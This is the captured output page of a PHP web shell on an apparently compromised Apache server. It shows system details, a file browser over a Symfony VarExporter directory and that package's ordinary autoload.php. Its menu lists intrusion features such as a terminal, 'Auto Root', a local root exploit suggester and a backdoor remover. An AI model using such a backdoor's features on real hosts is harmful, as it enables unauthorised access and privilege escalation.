Linux webserver 6.8.0-49-generic #49~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Wed Nov 6 17:42:15 UTC 2 x86_64
Apache/2.4.52 (Ubuntu)
Server IP : 192.168.1.1 & Your IP : 18.191.203.35
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
php /
Symfony /
Component /
VarExporter /
Delete
Unzip
Name
Size
Permission
Date
Action
Exception
[ DIR ]
drwxr-xr-x
2025-02-20 06:51
Internal
[ DIR ]
drwxr-xr-x
2025-02-20 06:51
Instantiator.php
3.84
KB
-rw-r--r--
2022-01-29 18:08
VarExporter.php
3.55
KB
-rw-r--r--
2022-01-29 18:08
autoload.php
1.56
KB
-rw-r--r--
2025-02-05 16:33
Save
Rename
<?php // Require require_once 'Symfony/Polyfill/Php80/autoload.php'; // Suggest // @codingStandardsIgnoreFile // @codeCoverageIgnoreStart // this is an autogenerated file - do not edit spl_autoload_register( function($class) { static $classes = null; if ($classes === null) { $classes = array( 'symfony\\component\\varexporter\\exception\\classnotfoundexception' => '/Exception/ClassNotFoundException.php', 'symfony\\component\\varexporter\\exception\\exceptioninterface' => '/Exception/ExceptionInterface.php', 'symfony\\component\\varexporter\\exception\\notinstantiabletypeexception' => '/Exception/NotInstantiableTypeException.php', 'symfony\\component\\varexporter\\instantiator' => '/Instantiator.php', 'symfony\\component\\varexporter\\internal\\exporter' => '/Internal/Exporter.php', 'symfony\\component\\varexporter\\internal\\hydrator' => '/Internal/Hydrator.php', 'symfony\\component\\varexporter\\internal\\reference' => '/Internal/Reference.php', 'symfony\\component\\varexporter\\internal\\registry' => '/Internal/Registry.php', 'symfony\\component\\varexporter\\internal\\values' => '/Internal/Values.php', 'symfony\\component\\varexporter\\varexporter' => '/VarExporter.php' ); } $cn = strtolower($class); if (isset($classes[$cn])) { require __DIR__ . $classes[$cn]; } }, true, false ); // @codeCoverageIgnoreEnd // Files